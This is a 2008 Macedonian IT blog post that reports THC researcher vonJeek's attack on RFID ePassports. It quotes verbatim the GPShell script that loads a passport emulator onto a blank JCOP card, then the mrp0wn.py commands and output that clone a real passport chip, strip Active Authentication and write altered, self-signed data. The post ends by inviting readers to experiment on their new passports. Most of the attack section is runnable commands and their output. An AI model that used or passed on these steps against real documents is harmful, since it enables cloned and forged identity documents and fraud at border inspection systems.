IT.com.mk - Македонски ИТ портал - Елвис Присли е жив, не-сигурноста кај RFID чиповите

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

Елвис Присли е жив, не-сигурноста кај RFID чиповите

Автор: Ѓоко Крстиќ
Објавено на: 05.10.2008
Дечките од групата "The Hacker's Choice" (http://www.thc.org), поточно *Jeroen van Beek* (vonJeek) најде начин да ги дуплицира (клонира) и модифицира пасошите(Passport) коишто содржат во себе RFID (Radio-frequency identification) чип. Начинот на којшто нападот е успешен лежи во терминалот и модифицирани податоци во пасошот. vonJeek најде начин различен од "grunwald" нападот со што можеме да ги модифицираме нашите податоци на нашиот пасош без пронајдени грешки или предупредувања од страна на терминалот. За оваа цел, THC групата го избра кралот на "Rock & Roll"-от, Елвис Присли. Со помош на неколку алатки изработени од страна на групата, креираа пасош со личните податоци на долго заминатиот крал. Директно ќе ги вметнам изјавите од официјалниот сајт на THC групата: Just follow two easy steps: (1) Upload the emulator code to a blank JCOP v4.1 72k smart card Use your favorite tool to upload the CAP file. As an example GPShell is used. The script used to upload the CAP file: `P:\GPShell-1.4.2>type epassport.script mode_211 enable_trace establish_context card_connect -readerNumber 3 select -AID a000000003000000 open_sc -security 1 -keyind 0 -keyver 0 -mac_key 404142434445464748494a4b4c4d4e4 f -enc_key 404142434445464748494a4b4c4d4e4f delete -AID A0000002471001 delete -AID A00000024710 install -file epassport.cap -priv 00 -AID A0000002471001 -pkgAID A00000024710 card_disconnect release_context` A sample output of an actual upload: `P:\GPShell-1.4.2>GPShell.exe epassport.script mode_211 enable_trace establish_context card_connect -readerNumber 3 * reader name OMNIKEY CardMan 5x21-CL 0 select -AID a000000003000000 Command --> 00A4040008A000000003000000 Wrapped command --> 00A4040008A000000003000000 Response <-- 6F108408A000000003000000A5049F6501FF9000 .. .. .. Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100 02C90000B918E8E43A25117700 Response <-- 9000 card_disconnect release_context` The CAP file currently supports the following files: * EF.COM : 256 bytes (required file) * EF.SOD : 2560 bytes (required file) * EF.DG1 : 128 bytes (required file) * EF.DG2 : 24576 bytes (required file) * EF.DG3 : 20480 bytes (optional, future use) * EF.DG11: 128 bytes (optional, e.g. USA) * EF.DG12: 128 bytes (optional, e.g. USA) * EF.DG13: 64 bytes (optional, e.g. Japan) * EF.DG15: 256 bytes (optional, e.g. The Netherlands) If you need support of other DGs, please let vonJeek know. (2a) Clone the chip Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able to read a chip's content and to write it to an emulator. P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999 =============================================================================== = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek = = Use Jeroen van Beek's ePassport emulator as the target device. = =============================================================================== Put a ePassport near the terminal and press enter to continue... Reading document using KEY M3V0NJ33K000000999999, please be patient... Put the emulator near the terminal and press enter to continue... Writing new ePassport using files in /tmp. Writing /tmp/EF_COM.BIN: 0 bytes left... Writing /tmp/EF_SOD.BIN: 0 bytes left... Writing /tmp/EF_DG1.BIN: 0 bytes left... Writing /tmp/EF_DG2.BIN: 0 bytes left... Setting the secret key to M3V0NJ33K200000009999998. Done, happy mrp0wning ;) Use the following command to read the chip: ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" If your chip is protected using the optional Active Authentication mechanism, the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This attack will work on all inspection system implementations that are using e.g. ICAO's "worked examples", see this site for more info on that. (2b) Write saved data It's also possible to write chip data you've saved earlier using RFIDIOt's mrpkey.py. As an example you can use vonJeek's ePassport data. Note that this data is self-signed: vonJeek started his own country :-D P:\tmp>unzip vonjeek-epassport_dump.zip Archive: vonjeek-epassport_dump.zip extracting: EF_COM.BIN inflating: EF_DG2.BIN inflating: EF_DG1.BIN extracting: EF_SOD.BIN P:\>cd \RFIDIOt-vonjeek P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp =============================================================================== = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek = = Use Jeroen van Beek's ePassport emulator as the target device. = =============================================================================== Document type is PASSPORT. Put the emulator near the terminal and press enter to continue... Writing new ePassport using files in /tmp. Writing /tmp/EF_COM.BIN: 0 bytes left... Writing /tmp/EF_SOD.BIN: 0 bytes left... Writing /tmp/EF_DG1.BIN: 0 bytes left... Writing /tmp/EF_DG2.BIN: 0 bytes left... Setting the secret key to M3V0NJ33K200000009999998. Done, happy mrp0wning ;) Use the following command to read the chip: ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" You can also alter data before writing it to an emulator chip. If you want to do that: this document contains details about - amongst others - DG1 and DG2 encoding. If you've updated the DGs you can sign them using Peter Gutmann's CryptLib. A read-out of vonJeek's ePassport chip using the reference implementation named Golden Reader Tool can be seen below. И за крај, во прилог следува видеото во кое јасно се гледа што всушност дечките сакаа да кажат: Така да, народе овие нашиве нови пасоши се со вграден RFID чип, и можете да експериментирате ;). За понеупатените...долуприкажаната слика е ознака дека во тој уред или вид на идентификација, има вградено RFID чип. Референти: - http://freeworld.thc.org/thc-epassport/ - http://blog.thc.org/index.php?/archives/4-The-Risk-of-ePassports-and-RFID.html - http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx - http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf - http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf#page=12 - http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece - http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece Клучни зборови: RFID Клонирање Пасош Passport Слабост THC vonJeek Модификација

Сподели:

Последни написи на Ѓоко

Mozilla: Проверете ги вашите плагини
објавено на 21.10.2009 во Интернет

Во соработка со Adobe Product Security Incident Response Team (PSIRT)
објавено на 24.08.2009 во Сигурност

Збогување со milw0rm.com
објавено на 08.07.2009 во Интернет

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

Hubble

Телескопот Hubble е лансиран од страна на САД на 24 Април, 1990 година а името го добил по астрономерот Едвин Хабл (Edwin Hubble). Hubble е LEO (Low Earth Orbiting) тип на сателит кој е лоциран 600 километри над површината на Земјата. Телескопот завршува цела орбита околу Земјата секои 97 минути.

Нема настани во наредните денови.